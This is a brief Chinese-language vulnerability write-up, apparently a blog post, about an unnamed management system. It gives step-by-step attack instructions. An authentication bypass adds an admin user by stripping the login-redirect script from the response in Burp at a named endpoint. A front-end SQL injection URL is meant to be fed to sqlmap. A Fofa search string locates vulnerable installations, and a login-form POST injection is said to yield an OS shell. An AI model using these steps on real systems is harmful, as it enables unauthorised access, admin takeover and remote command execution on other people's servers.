未授权添加管理用户

这套程序挺多未授权访问的(可以说是逻辑漏洞)

漏洞地址

/Module/BackManager/BaseUserInfo.aspx?cmd=add

使用Burp直接抓包拦截response返回包 删除如下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<script type="text/javascript">
//<![CDATA[
top.location.href='/Login.aspx?;
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
    ValidatorOnLoad();
}

function ValidatorOnSubmit() {
    if (Page_ValidationActive) {
        return ValidatorCommonOnSubmit();
    }
    else {
        return true;
    }
}
        //]]>
</script>

go 一路放包

前台Sql注入

漏洞地址

Module/ConvertManager/dhcontrol.php?did=1&param=1234&money=1200.00&status=1&fkorderid=

直接sqlmap 一把唆

更新另一版本

Fofa 关键词:body="/Content/images/login_title_bg.png"

登录地址存在 Post 注入 直接OSshell